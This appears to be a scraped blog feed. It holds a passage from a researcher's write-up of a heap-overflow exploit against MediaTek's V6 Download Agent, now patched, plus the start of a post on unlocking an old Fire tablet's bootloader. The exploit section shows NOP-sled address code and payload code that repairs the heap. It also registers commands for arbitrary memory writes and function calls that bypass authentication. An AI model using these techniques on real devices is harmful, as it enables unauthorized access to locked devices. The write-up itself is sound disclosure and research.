&lt;p&gt;What actually matters is the size of the filename when &lt;code&gt;mxmlLoadString&lt;/code&gt; sees it. A 5KB filename of &lt;code&gt;&amp;amp;&lt;/code&gt; characters? 5KB node allocation. A 5KB filename of &lt;code&gt;A&lt;/code&gt; characters? Same thing.&lt;/p&gt;
&lt;p&gt;So we simplified: just send a bunch of &lt;code&gt;A&lt;/code&gt;s. We started small (1KB, 2KB, 3KB) and kept watching the heap through our hooks until the allocations lined up.&lt;/p&gt;
&lt;p&gt;At around 5KB, the XML filename node landed right after our AIO2 buffer, exactly where we needed it.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/different-approaches.png&quot; alt=&quot;Different exploit approaches&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Same result, far less complexity, though as we later learned, the extra complexity with special characters was intentional obfuscation.&lt;/p&gt;
&lt;h2&gt;Landing the Shellcode&lt;/h2&gt;
&lt;p&gt;There&apos;s one more challenge we haven&apos;t addressed: where exactly does our shellcode land?&lt;/p&gt;
&lt;p&gt;The heap base address varies between devices and DA versions. On the Nothing Phone 2A, it starts at &lt;code&gt;0x4007F100&lt;/code&gt;. On other devices, it might be completely different.&lt;/p&gt;
&lt;p&gt;And even on the same device, the exact location of our AIO1 buffer depends on what allocations happened before it.&lt;/p&gt;
&lt;p&gt;We could try to calculate the exact address by analyzing the DA&apos;s initialization sequence, tracking every allocation, and predicting where our shellcode ends up.&lt;/p&gt;
&lt;p&gt;But that&apos;s fragile: any change in the DA&apos;s behavior would break our calculations. Instead, we took the lazy approach: &lt;strong&gt;NOP sleds&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The heap is huge, 800MB on every V6 DA we&apos;ve analyzed. We don&apos;t need to land precisely on our shellcode; we just need to land &lt;em&gt;somewhere&lt;/em&gt; in front of it.&lt;/p&gt;
&lt;p&gt;So we pad our payload with a massive NOP sled (about 10% of the heap size, roughly 80MB of NOPs), then place the actual shellcode at the end. When we overwrite &lt;code&gt;dpc-&amp;gt;cb&lt;/code&gt;, we point it near the end of the sled, at 95%.&lt;/p&gt;
&lt;p&gt;If we land anywhere in the sled, execution slides down through the NOPs until it hits our shellcode. As long as our target address is within the sled, we&apos;re good.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/shellcode-chunk.png&quot; alt=&quot;Shellcode chunk with NOP sled&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;We calculate the target address as 95% into the sled, aligned to 4 bytes for ARM:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;let sled_size = (heap_params.heap_size / 10) as usize;
let shellcode_addr = (heap_params.heap_base + (sled_size as f64 * 0.95) as u64) &amp;amp; !3;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It&apos;s not elegant, but it works reliably across different devices without needing precise heap layout predictions.&lt;/p&gt;
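&lt;p&gt;For readers more at home in C, the same arithmetic can be sketched like this. Note that it swaps the &lt;code&gt;f64&lt;/code&gt; multiply for integer math, so in edge cases it may round slightly differently from the Rust version; &lt;code&gt;sled_target&lt;/code&gt; is a name we made up for the example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdint.h&amp;gt;

/* Target address for dpc-&amp;gt;cb: 95% of the way through a sled that is
 * 10% of the heap, rounded down to a 4-byte instruction boundary. */
uint64_t sled_target(uint64_t heap_base, uint64_t heap_size)
{
    uint64_t sled_size = heap_size / 10;
    uint64_t offset = sled_size * 95 / 100; /* integer stand-in for * 0.95 */

    return (heap_base + offset) &amp;amp; ~(uint64_t)3;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Taking the heap base mentioned earlier (&lt;code&gt;0x4007F100&lt;/code&gt;) and assuming &quot;800MB&quot; means &lt;code&gt;0x32000000&lt;/code&gt; bytes, this lands on &lt;code&gt;0x44C7F100&lt;/code&gt;.&lt;/p&gt;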
&lt;h2&gt;Hakujoudai&lt;/h2&gt;
&lt;p&gt;With code execution achieved, we needed a payload that would give us persistent control over the DA. We called it &lt;strong&gt;hakujoudai&lt;/strong&gt; (白杖代).&lt;/p&gt;
&lt;p&gt;The name was shomy&apos;s idea; it&apos;s a reference to &lt;a href=&quot;https://hanako-kun.fandom.com/wiki/Tsueshiro&quot;&gt;Toilet-bound Hanako-kun&lt;/a&gt;, where hakujoudai are supernatural orbs used by ghosts to power up, scout, and take control of spaces beyond their reach.&lt;/p&gt;
&lt;p&gt;We thought it fit: we corrupt the heap, leave it for dead, then come back to haunt it.&lt;/p&gt;
&lt;h3&gt;The Problem&lt;/h3&gt;
&lt;p&gt;After the exploit triggers, we have a problem: the heap is corrupted.&lt;/p&gt;
&lt;p&gt;Remember, we overwrote the XML filename buffer&apos;s chunk header with a fake pointer to the DPC region. When &lt;code&gt;free()&lt;/code&gt; processed this corrupted chunk, it inserted our fake &quot;chunk&quot; into the free list.&lt;/p&gt;
&lt;p&gt;Now the heap&apos;s free list contains an entry pointing to &lt;code&gt;0x40070028&lt;/code&gt;, which isn&apos;t heap memory at all.&lt;/p&gt;
&lt;p&gt;If we just ran arbitrary code and returned, the next allocation or free would try to use this corrupted free list and crash. We need to fix the heap before doing anything else.&lt;/p&gt;
&lt;h3&gt;Fixing the Heap&lt;/h3&gt;
&lt;p&gt;The first thing hakujoudai does is repair the damage. It walks the free list and validates each entry.&lt;/p&gt;
&lt;p&gt;If a chunk&apos;s address falls outside the heap region (&lt;code&gt;[heap_base, heap_base + heap_size]&lt;/code&gt;), it&apos;s invalid and gets unlinked:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while (iterations++ &amp;lt; max_iter) {
    bool valid = ptr_valid((uintptr_t)curr, (uintptr_t)head, end);
    
    if (valid) {
        // Keep this chunk in the list
        last_valid-&amp;gt;next = curr;
        curr-&amp;gt;prev = last_valid;
        last_valid = curr;
    } else {
        // Invalid chunk, skip it and clear DPC if needed
        if ((uintptr_t)curr &amp;lt;= base || (uintptr_t)curr &amp;gt; end)
            clear_dpc((uintptr_t)curr);
    }
    
    curr = next;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When we encounter our fake chunk (pointing to DPC), we also clear the DPC structure to prevent the callback from firing again:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void clear_dpc(uintptr_t corrupted_node)
{
    uintptr_t dpc_key_addr = corrupted_node + DPC_KEY_OFFSET;
    memset((void *)dpc_key_addr, 0, DPC_CLEAR_SIZE);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/heap-fix.png&quot; alt=&quot;Heap fixing with hakujoudai&quot; /&gt;
&lt;/div&gt;
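&lt;p&gt;The excerpts above leave out the setup around the loop, so here&apos;s a self-contained sketch of the same idea. It assumes a circular, doubly linked free list hanging off a sentinel node, which is our simplification and not necessarily the DA&apos;s exact layout, and it skips the DPC cleanup. All names are hypothetical:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stddef.h&amp;gt;

struct free_chunk {
    struct free_chunk *prev;
    struct free_chunk *next;
};

/* Is p inside [base, end)? */
static int in_heap(const void *p, uintptr_t base, uintptr_t end)
{
    uintptr_t a = (uintptr_t)p;
    return a &amp;gt;= base &amp;amp;&amp;amp; a &amp;lt; end;
}

/* Walk the list hanging off the sentinel `head` and relink only the nodes
 * that live inside the heap. Returns the number of nodes dropped.
 * max_iter bounds the walk in case the list is cyclic garbage. */
size_t prune_free_list(struct free_chunk *head, uintptr_t base,
                       uintptr_t end, size_t max_iter)
{
    struct free_chunk *last_valid = head;
    struct free_chunk *curr = head-&amp;gt;next;
    size_t dropped = 0;

    while (curr != NULL &amp;amp;&amp;amp; curr != head &amp;amp;&amp;amp; max_iter-- &amp;gt; 0) {
        struct free_chunk *next = curr-&amp;gt;next; /* read before relinking */

        if (in_heap(curr, base, end)) {
            last_valid-&amp;gt;next = curr;
            curr-&amp;gt;prev = last_valid;
            last_valid = curr;
        } else {
            dropped++; /* fake chunk: simply not relinked */
        }
        curr = next;
    }

    last_valid-&amp;gt;next = head; /* close the circular list again */
    head-&amp;gt;prev = last_valid;
    return dropped;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The important detail is reading &lt;code&gt;curr-&amp;gt;next&lt;/code&gt; before touching any links, so the walk can step over the fake chunk and still reach the valid nodes behind it.&lt;/p&gt;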
&lt;h3&gt;Custom Commands&lt;/h3&gt;
&lt;p&gt;With the heap fixed, we can safely use the DA&apos;s API. Instead of reimplementing USB communication from scratch, we hook into the existing command system:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;register_major_command(&quot;CMD:BOOT-TO&quot;, &quot;1&quot;, cmd_boot_to);
register_major_command(&quot;CMD:EXP-CALL-FUNC&quot;, &quot;1&quot;, cmd_call_function);
register_major_command(&quot;CMD:EXP-PATCH-MEM&quot;, &quot;1&quot;, cmd_patch_mem);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These three commands give us everything we need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;CMD:BOOT-TO&lt;/code&gt;&lt;/strong&gt;: Downloads and executes DA extensions, second-stage payloads that add functionality to the exploited DA.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;CMD:EXP-PATCH-MEM&lt;/code&gt;&lt;/strong&gt;: Writes arbitrary data to any address. Penumbra uses this to patch out security checks directly.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;code&gt;CMD:EXP-CALL-FUNC&lt;/code&gt;&lt;/strong&gt;: Calls any function at a given address. On devices with DA SLA enabled, most commands are only registered after authentication. We use this to invoke the registration function directly, unlocking all commands without passing SLA.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Returning to the Command Loop&lt;/h3&gt;
&lt;p&gt;The final trick: instead of spinning in our own loop, we return to the DA&apos;s original command loop:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dagent_command_loop2();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This means the DA continues running normally, processing commands as usual, except now it also responds to our custom commands. From the host&apos;s perspective, it&apos;s still talking to a standard V6 DA, just with a few extra capabilities.&lt;/p&gt;
&lt;h3&gt;Dynamic Address Resolution&lt;/h3&gt;
&lt;p&gt;You might have noticed the function pointers look suspicious:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static void (*const volatile register_major_command)(...) = (void *)0x11111111;
static void (*const volatile dagent_command_loop2)(void) = (void *)0x22222222;
static volatile uintptr_t heap_struct = 0x33333333;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These are placeholders. Before sending the payload, penumbra analyzes the target DA binary and patches these addresses with the real values:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;patch_pattern_str(&amp;amp;mut payload_bin, &quot;11111111&quot;, &amp;amp;bytes_to_hex(&amp;amp;params.reg_cmd.to_le_bytes()))?;
patch_pattern_str(&amp;amp;mut payload_bin, &quot;22222222&quot;, &amp;amp;bytes_to_hex(&amp;amp;params.cmd_loop.to_le_bytes()))?;
patch_pattern_str(&amp;amp;mut payload_bin, &quot;33333333&quot;, &amp;amp;bytes_to_hex(&amp;amp;params.theheap.to_le_bytes()))?;
// ... etc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This makes hakujoudai work across different DA versions without hardcoding addresses.&lt;/p&gt;
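&lt;p&gt;The patching step itself is conceptually simple. Here&apos;s a rough C sketch of the idea, not penumbra&apos;s actual implementation: it assumes 32-bit placeholder values stored little-endian and patches every occurrence it finds. &lt;code&gt;patch_placeholder&lt;/code&gt; is a hypothetical helper:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stddef.h&amp;gt;
#include &amp;lt;string.h&amp;gt;

/* Replace every little-endian occurrence of a 32-bit placeholder in a
 * payload image with the real value. Returns the number of patches. */
size_t patch_placeholder(uint8_t *buf, size_t len,
                         uint32_t placeholder, uint32_t value)
{
    uint8_t pat[4], rep[4];
    size_t hits = 0;

    for (int i = 0; i &amp;lt; 4; i++) {
        pat[i] = (uint8_t)(placeholder &amp;gt;&amp;gt; (8 * i));
        rep[i] = (uint8_t)(value &amp;gt;&amp;gt; (8 * i));
    }

    for (size_t off = 0; off + 4 &amp;lt;= len; off++) {
        if (memcmp(buf + off, pat, 4) == 0) {
            memcpy(buf + off, rep, 4);
            hits++;
            off += 3; /* together with off++, skip the bytes just patched */
        }
    }
    return hits;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Checking the return value is a cheap sanity test: zero hits means the payload and the patcher disagree about a placeholder.&lt;/p&gt;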
&lt;h1&gt;Results&lt;/h1&gt;
&lt;p&gt;We integrated everything into penumbra. It parses the DA to extract addresses, calculates heap parameters, builds the payload with the right offsets, and sends it off.&lt;/p&gt;
&lt;p&gt;Here&apos;s what it looks like from the host:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/penumbra-heapb8.png&quot; width=&quot;100%&quot; alt=&quot;Penumbra running HeapB8 exploit&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;And on UART, hakujoudai doing its thing, fixing the heap and registering our commands:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/heapb8/haku.png&quot; width=&quot;70%&quot; alt=&quot;Hakujoudai fixing heap and registering commands&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;After that, penumbra patches out security checks and proceeds normally. Full read/write access, no auth required :)!&lt;/p&gt;
&lt;p&gt;From here you can dump partitions, flash images, or unlock the bootloader on devices where the stock DA would otherwise block you.&lt;/p&gt;
&lt;h1&gt;Fixes&lt;/h1&gt;
&lt;p&gt;MediaTek patched both vulnerabilities sometime in 2025. We don&apos;t know the exact date, but we found two CVEs that appear to match:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/cve-2025-20658&quot;&gt;&lt;strong&gt;CVE-2025-20658&lt;/strong&gt;&lt;/a&gt;: In DA, there is a possible permission bypass due to a logic error. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. (Patch ID: &lt;code&gt;ALPS09474894&lt;/code&gt;)&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/cve-2025-20656&quot;&gt;&lt;strong&gt;CVE-2025-20656&lt;/strong&gt;&lt;/a&gt;: In DA, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. (Patch ID: &lt;code&gt;ALPS09625423&lt;/code&gt;)&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We suspect the first one corresponds to the USB overflow since the loop condition was technically correct but logically flawed.&lt;/p&gt;
&lt;p&gt;And the second one matches the XML expansion overflow since it lacked proper bounds checking when writing to the destination buffer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;However, these are just our assumptions based on the descriptions so take them with a grain of salt.&lt;/strong&gt;&lt;/p&gt;
&lt;h3&gt;XML Expansion Fix&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;mxml_escape&lt;/code&gt; function now allocates a properly sized buffer and checks for overflow before each write:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#define DEST_BUFFER_SIZE (MAX_FILE_NAME_LEN * 6)

if (dest == NULL)
    dest = (char *)malloc(DEST_BUFFER_SIZE);

// ...

for (; i &amp;lt; len; ++i) {
    if ((p - dest) &amp;gt;= (DEST_BUFFER_SIZE - 6)) {
        LOGE(&quot;Dest XML file name buffer overflow&quot;);
        return &quot;&quot;;
    }
    // ... expansion logic ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The buffer is now &lt;code&gt;MAX_FILE_NAME_LEN * 6&lt;/code&gt; to account for worst-case expansion (all &lt;code&gt;&quot;&lt;/code&gt; characters becoming &lt;code&gt;&amp;amp;quot;&lt;/code&gt;), and it bails out if there&apos;s not enough space for another expansion.&lt;/p&gt;
&lt;h3&gt;USB Overflow Fix&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;fp_read_host_file&lt;/code&gt; function now calculates the correct number of bytes to read instead of blindly using &lt;code&gt;package_len&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while (xfered &amp;lt; total_length) {
    // ...
    
    len = total_length - xfered;
    len = len &amp;gt;= package_len ? package_len : len;
    
    if (channel-&amp;gt;read(buf + xfered, (uint32_t *)&amp;amp;len) != 0) {
        // ...
    }
    // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instead of &lt;code&gt;len = package_len&lt;/code&gt;, it now calculates the remaining bytes (&lt;code&gt;total_length - xfered&lt;/code&gt;) and uses whichever is smaller. This prevents reading more data than the buffer can hold.&lt;/p&gt;
&lt;p&gt;The loop condition also changed to prevent issues if &lt;code&gt;xfered&lt;/code&gt; somehow overshoots &lt;code&gt;total_length&lt;/code&gt;.&lt;/p&gt;
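&lt;p&gt;Pulled out into a standalone helper, the clamping logic looks like this (a sketch mirroring the snippet above; the function name is ours):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdint.h&amp;gt;

/* Length to request for the next read: never more than what is still
 * missing, and never more than one package.
 * The caller guarantees xfered &amp;lt; total_length (the loop condition). */
uint32_t next_read_len(uint32_t total_length, uint32_t xfered, uint32_t package_len)
{
    uint32_t remaining = total_length - xfered;

    return remaining &amp;gt;= package_len ? package_len : remaining;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With the values from the exploit, &lt;code&gt;next_read_len(0x13FC, 0, 0x20000)&lt;/code&gt; returns &lt;code&gt;0x13FC&lt;/code&gt;, so the read can no longer run past the allocation.&lt;/p&gt;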
&lt;h1&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;This was my first time diving into heap exploitation, and honestly, it was a lot of fun. Frustrating at times, especially those hours wasted on the XML overflow, but incredibly rewarding once everything clicked.&lt;/p&gt;
&lt;p&gt;Working with shomy made the whole process more enjoyable. Neither of us had done anything like this before, so it was a lot of trial and error, and &lt;em&gt;&quot;wait, what if we try this?&quot;&lt;/em&gt; moments. Somehow it all came together!&lt;/p&gt;
&lt;p&gt;Big thanks to &lt;a href=&quot;https://github.com/AntiEngineer&quot;&gt;@AntiEngineer&lt;/a&gt; for the UART work and all the help along the way. Also thanks to &lt;a href=&quot;https://t.me/erdilS&quot;&gt;@erdilS&lt;/a&gt; for lending us the Chimera license that started this whole rabbit hole.&lt;/p&gt;
&lt;p&gt;And of course, credit where it&apos;s due: the Chimera team found the vulnerability, and even though their obfuscation had us chasing ghosts for a while, they deserve recognition for the original discovery.&lt;/p&gt;
&lt;p&gt;The full exploit is available in &lt;a href=&quot;https://github.com/shomykohai/penumbra/blob/main/core/src/exploit/heapbait.rs&quot;&gt;penumbra&lt;/a&gt; and the hakujoudai payload in &lt;a href=&quot;https://github.com/shomykohai/mtk-payloads/tree/main/hakujoudai&quot;&gt;mtk-payloads&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;Feel free to reach out on Telegram or mail if you have questions regarding the exploit (&lt;em&gt;technical ones, please, not &quot;how do I unbrick my bricked XYZ.&quot;&lt;/em&gt;).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thanks for reading! If you made it this far, we hope it was worth it!&lt;/strong&gt;&lt;/p&gt;
</content:encoded></item><item><title>Hacking a 2014 tablet... in 2024!</title><link>https://blog.r0rt1z2.com/posts/hacking-2014-tablet/</link><guid isPermaLink="true">https://blog.r0rt1z2.com/posts/hacking-2014-tablet/</guid><description>Unlocking the bootloader of the old but gold Amazon Fire HD6 / HD7 2014</description><pubDate>Sun, 21 Jul 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Yes, you heard that right, &lt;strong&gt;10 years after its release&lt;/strong&gt;, I managed to hack and unlock the first MediaTek based Amazon tablet that went on sale, the Amazon Fire HD6 / HD7 2014 (codenamed &lt;code&gt;ariel&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;In this article, I&apos;ll explain my journey in detail without making it too long. If you prefer to skip ahead and see the source code directly (no judgment, I don&apos;t like to read or write much either), you can find it &lt;a href=&quot;https://github.com/R0rt1z2/amonet/tree/mt8135-ariel&quot;&gt;here&lt;/a&gt;!&lt;/p&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;You might be wondering why I decided to tinker with such an old device, especially after so much time has passed since its release. The reason is simple: &lt;strong&gt;its SoC&lt;/strong&gt;. While MediaTek devices are quite common, this tablet features a unique SoC, the &lt;strong&gt;MT8135&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;So, what&apos;s so special about it? Well, nothing much, really. It feels like a tablet version of the MT6595, which was used in phones like the Meizu MX4. The real interest lies in the fact that no one had managed to unlock this device because of its unique quirks, which we&apos;ll run into as the article progresses.&lt;/p&gt;
&lt;h2&gt;Getting the device&lt;/h2&gt;
&lt;p&gt;Although it may sound stupid, the first problem I encountered was finding the device, as it was never sold in Spain. In total, throughout my journey, I acquired two HD7s and two HD6s (one of which eventually died).&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hd6-collection.jpg&quot; width=&quot;60%&quot; alt=&quot;My ariel collection :)&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The first unit was purchased from Wallapop, a popular platform for buying and selling second-hand products in Spain. The two HD7s were bought from eBay and imported directly from the U.S., which cost me quite a bit. The second HD6 was generously donated by kip_dynamite, to whom I owe a huge thanks.&lt;/p&gt;
&lt;h2&gt;Analyzing the firmware&lt;/h2&gt;
&lt;p&gt;As seen on other Amazon devices, this tablet runs a heavily modified version of Android called FireOS. To my surprise, it was released with FireOS 4 (based on Android 4.4) but received an update to FireOS 5 (based on Android 5.1.1).&lt;/p&gt;
&lt;p&gt;Given that this is such an old device, I assumed its firmware would be similar to the 2015 Fire 7. So, I proceeded to download the latest stock firmware available for this device and extracted it. The result surprised me because something very important seemed to be missing... or at least that was my initial impression.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc:~/Downloads/update$ tree -L 2
.
├── boot.img
├── file_contexts
├── images
│   ├── lk.bin
│   └── tz.img
├── META-INF
│   ├── CERT.RSA
│   ├── CERT.SF
│   ├── com
│   └── MANIFEST.MF
├── ota.prop
├── system
│   └── build.prop
├── system.new.dat
├── system.patch.dat
└── system.transfer.list

5 directories, 12 files
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In case you haven&apos;t noticed, the Preloader image is missing. As I mentioned before, this device has quite a few special quirks, and this is one of them.&lt;/p&gt;
&lt;p&gt;After realizing the Preloader was missing, I decided to do some research and came across an XDA thread that provided the location of TX and included a few UART logs from an HD6. Fortunately, one of the log links was still working, allowing me to understand how the boot chain worked on this device.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[PL0] Build Time: 20140829-000812
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That is the very first line of the log. It looks like the &lt;strong&gt;P&lt;/strong&gt;re&lt;strong&gt;L&lt;/strong&gt;oader printing its build time, but what does that &lt;code&gt;0&lt;/code&gt; stand for? If we read a few more lines, we can find the answer to that question:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[PL0] Build Time: 20140925-030705 
[SD0] Bus Width: 1 
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(0) DDR(0) DIV(193) DS(0) RS(0) 
[SD0] Switch to High-Speed mode! 
[SD0] SET_CLK(260kHz): SCLK(259kHz) MODE(2) DDR(1) DIV(96) DS(0) RS(0) 
[SD0] Bus Width: 8 
[SD0] Size: 14910 MB, Max.Speed: 52000 kHz, blklen(512), nblks(30535680), ro(0) 
[SD0] Initialized 
[SD0] SET_CLK(52000kHz): SCLK(50000kHz) MODE(2) DDR(1) DIV(0) DS(0) RS(0) 
msdc_ett_offline_to_pl: size&amp;lt;2&amp;gt; m_id&amp;lt;0x15&amp;gt; 
msdc &amp;lt;0&amp;gt; &amp;lt;HYNIX &amp;gt; &amp;lt;MAG2GC&amp;gt; 
msdc &amp;lt;1&amp;gt; &amp;lt;xxxxxx&amp;gt; &amp;lt;MAG2GC&amp;gt; 
msdc failed to find 
=========use hc erase size 
[PL0] Init MMC: OK(0) 
[ROM_INFO] &apos;v2&apos;,&apos;0x3100000&apos;,&apos;0x20000&apos;,&apos;0x3D80000&apos;,&apos;0x2C00&apos; 
[PART] 1: 00000100 00000040 &apos;PRO_INFO&apos; 
[PART] 2: 00002000 00000800 &apos;PMT&apos; 
[PART] 3: 00002800 00002800 &apos;TEE1&apos; 
[PART] 4: 00002800 00005000 &apos;TEE2&apos; 
[PART] 5: 00000400 00007800 &apos;UBOOT&apos; 
[PART] 6: 00004000 00007C00 &apos;boot_x&apos; 
[PART] 7: 00004000 0000BC00 &apos;recovery_x&apos; 
[PART] 8: 00000800 0000FC00 &apos;KB&apos; 
[PART] 9: 00000800 00010400 &apos;DKB&apos; 
[PART] 10: 00000400 00010C00 &apos;MISC&apos; 
[PART] 11: 00008000 00011000 &apos;persisbackup&apos; 
[PART] 12: 00258000 00019000 &apos;system&apos; 
[PART] 13: 0019A000 00271000 &apos;cache&apos; 
[PART] 14: 0000F000 0040B000 &apos;boot&apos; 
[PART] 15: 0000F000 0041A000 &apos;recovery&apos; 
[PART] 16: 018F3FDF 00429000 &apos;userdata&apos; 
[PL0] loading partition &apos;TEE1&apos; offset=00300000 at address=12001000 
[PART] Image with part header 
[PART] name : PL1 
[PART] addr : FFFFFFFFh 
[PART] size : 112636 
[PART] magic: 58881688h 
[PART] load &quot;2&quot; from 0x0000000001800200 (dev) to 0x12001000 (mem) [SUCCESS] 
[PART] load speed: 21999KB/s, 112636 bytes, 5ms 
[PL0] Load PL1 from  partition &apos;TEE1&apos;@ 8X: err=3145728 
[PL0]RSA2048 signature for PL1[key0]: (img_size 112380) 
[PL0]image verification passed for PL1[key0] 
[PL0] PL1 Load OK from TEE1: err=0 
[PL0] jump to 12001000 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Apparently, the Preloader is divided into two different stages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;PL0&lt;/code&gt;: This stage initializes the eMMC, sets up the clock and bus width, and parses the GPT to identify partitions. It then loads and verifies &lt;code&gt;PL1&lt;/code&gt; from the &lt;code&gt;TEE1&lt;/code&gt; partition before jumping to execute it.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;code&gt;PL1&lt;/code&gt;: This stage initializes the PMIC and I2C, performs hardware checks, and sets up the RTC, the DRAM, and the boot device. It then verifies and loads the &lt;code&gt;LK&lt;/code&gt; and &lt;code&gt;TEE&lt;/code&gt; images, performs cryptographic checks, and sets up the boot arguments. Finally, it jumps to the &lt;code&gt;TEE&lt;/code&gt; image to continue the boot process.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With this information, I extracted the latest PL1 image from the &lt;code&gt;tz.img&lt;/code&gt; we previously downloaded. Knowing its offset is &lt;code&gt;0x00300000&lt;/code&gt; (as seen in the UART log), I used UNIX &lt;code&gt;dd&lt;/code&gt; to cut the image:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;r0rt1z2@r0rt1z2-pc $ dd if=tz.img of=PL1.img bs=1 skip=$((0x300000))
113328+0 records in
113328+0 records out
113328 bytes (113 kB, 111 KiB) copied, 0.234714 s, 483 kB/s
r0rt1z2@r0rt1z2-pc $ hexdump -C PL1.img | head -n5
00000000  88 16 88 58 b0 b8 01 00  50 4c 31 00 00 00 00 00  |...X....PL1.....|
00000010  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00  ff ff ff ff ff ff ff ff  |................|
00000030  ff ff ff ff ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
*
r0rt1z2@r0rt1z2-pc: $
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Success! We&apos;ve obtained a clean dump of the second Preloader stage image. As for the rest of the firmware, everything was similar, if not identical, to the Fire 7 2015. Both LK and the rest of the TZ work the same way, and FireOS has the same structure. For those interested, I have uploaded a full dump to my dumpyard.&lt;/p&gt;
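&lt;p&gt;As a quick sanity check, the header fields visible in the hexdump can be decoded with a few lines of Python. This is only a sketch: the field layout (magic, payload size, a 32-byte name, then the load address) is inferred from the hexdump and the UART log above, and &lt;code&gt;parse_part_header&lt;/code&gt; is a made-up helper name, not something taken from amonet.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PART_MAGIC = 0x58881688  # "magic: 58881688h" in the UART log


def parse_part_header(blob):
    """Decode the start of a partition header (layout inferred, not official)."""
    magic = int.from_bytes(blob[0:4], "little")
    if magic != PART_MAGIC:
        raise ValueError(f"unexpected magic 0x{magic:08x}")
    return {
        "size": int.from_bytes(blob[4:8], "little"),
        "name": blob[8:40].split(b"\x00", 1)[0].decode("ascii"),
        "addr": int.from_bytes(blob[40:44], "little"),
    }


# First 0x30 bytes of PL1.img, copied from the hexdump above.
header = bytes.fromhex("88168858b0b80100504c3100") + bytes(28) + b"\xff" * 8
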